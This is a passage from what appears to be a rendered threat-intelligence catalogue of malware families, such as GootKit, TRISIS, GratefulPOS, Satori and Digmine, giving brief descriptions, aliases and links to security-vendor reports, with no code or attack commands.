<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0">https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gootkit"><a class="anchor" href="#_gootkit"></a><a class="link" href="#_gootkit">GootKit</a></h3>
<div class="paragraph">
<p>As was the case earlier, the bot Gootkit is written in NodeJS, and is downloaded to a victim computer via a chain of downloaders. The main purpose of the bot also remained the same to steal banking data. The new Gootkit version, detected in September, primarily targets clients of European banks, including those in Germany, France, Italy, the Netherlands, Poland, etc.</p>
</div>
<div class="paragraph">
<p>GootKit is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Gootkit</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2772. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/inside-the-gootkit-cc-server/76433/">https://securelist.com/inside-the-gootkit-cc-server/76433/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/">https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/gootkit-launches-redirection-attacks-in-the-uk/">https://securityintelligence.com/gootkit-launches-redirection-attacks-in-the-uk/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2010-051118-0604-99">https://www.symantec.com/security_response/writeup.jsp?docid=2010-051118-0604-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_agent_tesla"><a class="anchor" href="#_agent_tesla"></a><a class="link" href="#_agent_tesla">Agent Tesla</a></h3>
<div class="paragraph">
<p>Agent Tesla is modern powerful keystroke logger. It provides monitoring your personel computer via keyboard and screenshot. Keyboard, screenshot and registered passwords are sent in log. You can receive your logs via e-mail, ftp or php(web panel).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2773. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.agenttesla.com/">https://www.agenttesla.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ordinypt"><a class="anchor" href="#_ordinypt"></a><a class="link" href="#_ordinypt">Ordinypt</a></h3>
<div class="paragraph">
<p>A new ransomware strain called Ordinypt is currently targeting victims in Germany, but instead of encrypting users' documents, the ransomware rewrites files with random data. Ordinypt is actually a wiper and not ransomware because it does not bother encrypting anything, but just replaces files with random data.</p>
</div>
<div class="paragraph">
<p>Ordinypt is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HSDFSDCrypt</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2774. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/">https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_strongpity2"><a class="anchor" href="#_strongpity2"></a><a class="link" href="#_strongpity2">StrongPity2</a></h3>
<div class="paragraph">
<p>Detected by ESET as Win32/StrongPity2, this spyware notably resembles one that was attributed to the group called StrongPity.</p>
</div>
<div class="paragraph">
<p>StrongPity2 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Win32/StrongPity2</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2775. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/">https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wp_vcd"><a class="anchor" href="#_wp_vcd"></a><a class="link" href="#_wp_vcd">wp-vcd</a></h3>
<div class="paragraph">
<p>WordPress site owners should be on the lookout for a malware strain tracked as wp-vcd that hides in legitimate WordPress files and that is used to add a secret admin user and grant attackers control over infected sites.
The malware was first spotted online over the summer by Italian security researcher Manuel D&#8217;Orso.
The initial version of this threat was loaded via an include call for the wp-vcd.php file —hence the malware&#8217;s name— and injected malicious code into WordPress core files such as functions.php and class.wp.php. This was not a massive campaign, but attacks continued throughout the recent months.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2776. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/wp-vcd-wordpress-malware-campaign-is-back/">https://www.bleepingcomputer.com/news/security/wp-vcd-wordpress-malware-campaign-is-back/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/wp-vcd-wordpress-malware-spreads-via-nulled-wordpress-themes/">https://www.bleepingcomputer.com/news/security/wp-vcd-wordpress-malware-spreads-via-nulled-wordpress-themes/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moneytaker_5_0"><a class="anchor" href="#_moneytaker_5_0"></a><a class="link" href="#_moneytaker_5_0">MoneyTaker 5.0</a></h3>
<div class="paragraph">
<p>malicious program for auto replacement of payment data in AWS CBR</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2777. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.group-ib.com/blog/moneytaker">https://www.group-ib.com/blog/moneytaker</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_quant_loader"><a class="anchor" href="#_quant_loader"></a><a class="link" href="#_quant_loader">Quant Loader</a></h3>
<div class="paragraph">
<p>Described as a "professional exe loader / dll dropper" Quant Loader is in fact a very basic trojan downloader. It began being advertised on September 1, 2016 on various Russian underground forums.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2778. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/quant-loader-is-now-bundled-with-other-crappy-malware/">https://www.bleepingcomputer.com/news/security/quant-loader-is-now-bundled-with-other-crappy-malware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground">https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sshdoor"><a class="anchor" href="#_sshdoor"></a><a class="link" href="#_sshdoor">SSHDoor</a></h3>
<div class="paragraph">
<p>The Secure Shell Protocol (SSH) is a very popular protocol used for secure data communication. It is widely used in the Unix world to manage remote servers, transfer files, etc. The modified SSH daemon described here, Linux/SSHDoor.A, is designed to steal usernames and passwords and allows remote access to the server via either an hardcoded password or SSH key.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2779. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/">https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trisis"><a class="anchor" href="#_trisis"></a><a class="link" href="#_trisis">TRISIS</a></h3>
<div class="paragraph">
<p>(Dragos Inc.) The team identifies this malware as TRISIS because it targets Schneider Electrics Triconex safety instrumented system (SIS) enabling the replacement of logic in final control elements. TRISIS is highly targeted and likely does not pose an immediate threat to other Schneider Electric customers, let alone other SIS products. (FireEye Inc.) This malware, which we call TRITON, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. We have not attributed the incident to a threat actor, though we believe the activity is consistent with a nation state preparing for an attack. TRITON is one of a limited number of publicly identified malicious software families targeted at industrial control systems (ICS). It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016.</p>
</div>
<div class="paragraph">
<p>TRISIS is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TRITON</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2780. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html">https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://dragos.com/blog/trisis/TRISIS-01.pdf">https://dragos.com/blog/trisis/TRISIS-01.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_osx_pirrit"><a class="anchor" href="#_osx_pirrit"></a><a class="link" href="#_osx_pirrit">OSX.Pirrit</a></h3>
<div class="paragraph">
<p>macOS adware strain</p>
</div>
<div class="paragraph">
<p>OSX.Pirrit is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OSX/Pirrit</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2781. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf">http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.cybereason.com/research-osx-pirrit-mac-adware">https://www2.cybereason.com/research-osx-pirrit-mac-adware</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf">https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gratefulpos_2"><a class="anchor" href="#_gratefulpos_2"></a><a class="link" href="#_gratefulpos_2">GratefulPOS</a></h3>
<div class="paragraph">
<p>GratefulPOS has the following functions
1. Access arbitrary processes on the target POS system
2. Scrape track 1 and 2 payment card data from the process(es)
3. Exfiltrate the payment card data via lengthy encoded and obfuscated DNS queries to a hardcoded domain registered and controlled by the perpetrators, similar to that described by Paul Rascagneres in his analysis of FrameworkPOS in 2014[iii], and more recently by Luis Mendieta of Anomoli in analysis of a precursor to this sample.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2782. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season">https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_prilex"><a class="anchor" href="#_prilex"></a><a class="link" href="#_prilex">PRILEX</a></h3>
<div class="paragraph">
<p>Prilex malware steals the information of the infected ATMs users. In this case, it was a Brazilian bank, but consider the implications of such an attack in your region, whether youre a customer or the bank.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2783. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/">http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cutlet_maker"><a class="anchor" href="#_cutlet_maker"></a><a class="link" href="#_cutlet_maker">CUTLET MAKER</a></h3>
<div class="paragraph">
<p>Cutlet Maker is an ATM malware designed to empty the machine of all its banknotes. Interestingly, while its authors have been advertising its sale, their competitors have already cracked the program, allowing anybody to use it for free.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2784. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/">http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_satori_2"><a class="anchor" href="#_satori_2"></a><a class="link" href="#_satori_2">Satori</a></h3>
<div class="paragraph">
<p>According to a report Li shared with Bleeping Computer today, the Mirai Satori variant is quite different from all previous pure Mirai variants.Previous Mirai versions infected IoT devices and then downloaded a Telnet scanner component that attempted to find other victims and infect them with the Mirai bot.The Satori variant does not use a scanner but uses two embedded exploits that will try to connect to remote devices on ports 37215 and 52869.Effectively, this makes Satori an IoT worm, being able to spread by itself without the need for separate components.</p>
</div>
<div class="paragraph">
<p>Satori is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Okiru</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2785. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/satori-botnet-has-sudden-awakening-with-over-280-000-active-bots/">https://www.bleepingcomputer.com/news/security/satori-botnet-has-sudden-awakening-with-over-280-000-active-bots/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant">https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powerspritz"><a class="anchor" href="#_powerspritz"></a><a class="link" href="#_powerspritz">PowerSpritz</a></h3>
<div class="paragraph">
<p>PowerSpritz is a Windows executable that hides both its legitimate payload and malicious PowerShell command using a non-standard implementation of the already rarely used Spritz encryption algorithm (see the Attribution section for additional analysis of the Spritz implementation). This malicious downloader has been observed being delivered via spearphishing attacks using the TinyCC link shortener service to redirect to likely attacker-controlled servers hosting the malicious PowerSpritz payload.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2786. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf">https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powerratankba"><a class="anchor" href="#_powerratankba"></a><a class="link" href="#_powerratankba">PowerRatankba</a></h3>
<div class="paragraph">
<p>PowerRatankba is used for the same purpose as Ratankba: as a first stage reconnaissance tool and for the deployment of further stage implants on targets that are deemed interesting by the actor. Similar to its predecessor, PowerRatankba utilizes HTTP for its C&amp;C communication.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2787. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf">https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ratankba"><a class="anchor" href="#_ratankba"></a><a class="link" href="#_ratankba">Ratankba</a></h3>
<div class="paragraph">
<p>In one instance we observed, one of the initial malware delivered to the victim, RATANKBA, connects to a legitimate but compromised website from which a hack tool (nbt_scan.exe) is also downloaded. The domain also serves as one of the campaigns platform for C&amp;C communication.
The threat actor uses RATANKBA to survey the lay of the land as it looks into various aspects of the host machine where it has been initially downloaded—the machine that has been victim of the watering hole attack. Information such as the running tasks, domain, shares, user information, if the host has default internet connectivity, and so forth.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2788. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/ratankba-watering-holes-against-enterprises/">http://blog.trendmicro.com/trendlabs-security-intelligence/ratankba-watering-holes-against-enterprises/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_usbstealer_2"><a class="anchor" href="#_usbstealer_2"></a><a class="link" href="#_usbstealer_2">USBStealer</a></h3>
<div class="paragraph">
<p>USBStealer serves as a network tool that extracts sensitive information from air-gapped networks. We have not seen this component since mid 2015.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2789. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/">https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_downdelph_2"><a class="anchor" href="#_downdelph_2"></a><a class="link" href="#_downdelph_2">Downdelph</a></h3>
<div class="paragraph">
<p>Downdelph is a lightweight downloader developed in the Delphi programming language. As we already mentioned in our white paper, its period of activity was from November 2013 to September 2015 and there have been no new variants seen since.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2790. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/">https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coinminer"><a class="anchor" href="#_coinminer"></a><a class="link" href="#_coinminer">CoinMiner</a></h3>
<div class="paragraph">
<p>Monero-mining malware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2791. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/">https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fruitfly"><a class="anchor" href="#_fruitfly"></a><a class="link" href="#_fruitfly">FruitFly</a></h3>
<div class="paragraph">
<p>A fully-featured backdoor, designed to perversely spy on Mac users</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2792. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html#FruitFly">https://objective-see.com/blog/blog_0x25.html#FruitFly</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_macdownloader"><a class="anchor" href="#_macdownloader"></a><a class="link" href="#_macdownloader">MacDownloader</a></h3>
<div class="paragraph">
<p>Iranian macOS exfiltration agent, targeting the 'defense industrial base' and human rights advocates.</p>
</div>
<div class="paragraph">
<p>MacDownloader is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>iKitten</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2793. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html#MacDownloader">https://objective-see.com/blog/blog_0x25.html#MacDownloader</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_empyre"><a class="anchor" href="#_empyre"></a><a class="link" href="#_empyre">Empyre</a></h3>
<div class="paragraph">
<p>The open-source macOS backdoor, 'Empye', maliciously packaged into a macro&#8217;d Word document</p>
</div>
<div class="paragraph">
<p>Empyre is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Empye</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2794. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html#Empyre">https://objective-see.com/blog/blog_0x25.html#Empyre</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_proton"><a class="anchor" href="#_proton"></a><a class="link" href="#_proton">Proton</a></h3>
<div class="paragraph">
<p>A fully-featured macOS backdoor, designed to collect and exfiltrate sensitive user data such as 1Password files, browser login data, and keychains.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2795. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html#Proton">https://objective-see.com/blog/blog_0x25.html#Proton</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mughthesec"><a class="anchor" href="#_mughthesec"></a><a class="link" href="#_mughthesec">Mughthesec</a></h3>
<div class="paragraph">
<p>Adware which hijacks a macOS user&#8217;s homepage to redirect search queries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2796. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pwnet"><a class="anchor" href="#_pwnet"></a><a class="link" href="#_pwnet">Pwnet</a></h3>
<div class="paragraph">
<p>A macOS crypto-currency miner, distributed via a trojaned 'CS-GO' hack.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2797. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cpumeaner"><a class="anchor" href="#_cpumeaner"></a><a class="link" href="#_cpumeaner">CpuMeaner</a></h3>
<div class="paragraph">
<p>A macOS crypto-currency mining trojan.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2798. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_travle"><a class="anchor" href="#_travle"></a><a class="link" href="#_travle">Travle</a></h3>
<div class="paragraph">
<p>The Travle sample found during our investigation was a DLL with a single exported function (MSOProtect). The malware name Travle was chosen given a string found in early samples of this family: “Travle Path Failed!”. This typo was replaced with correct word “Travel” in newer releases. We believe that Travle could be a successor to the NetTraveler family.</p>
</div>
<div class="paragraph">
<p>Travle is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PYLOT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2799. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/travle-aka-pylot-backdoor-hits-russian-speaking-targets/83455/">https://securelist.com/travle-aka-pylot-backdoor-hits-russian-speaking-targets/83455/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_digmine"><a class="anchor" href="#_digmine"></a><a class="link" href="#_digmine">Digmine</a></h3>
<div class="paragraph">
<p>Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the users Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the accounts friends. The abuse of Facebook is limited to propagation for now, but it wouldnt be implausible for attackers to hijack the Facebook account itself down the line. This functionalitys code is pushed from the command-and-control (C&amp;C) server, which means it can be updated.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2800. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/">https://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tscookie"><a class="anchor" href="#_tscookie"></a><a class="link" href="#_tscookie">TSCookie</a></h3>
<div class="paragraph">
<p>TSCookie itself only serves as a downloader. It expands functionality by downloading modules from C&amp;C servers. The sample that was examined downloaded a DLL file which has exfiltrating function among many others (hereafter “TSCookieRAT”). Downloaded modules only runs on memory.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2801. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
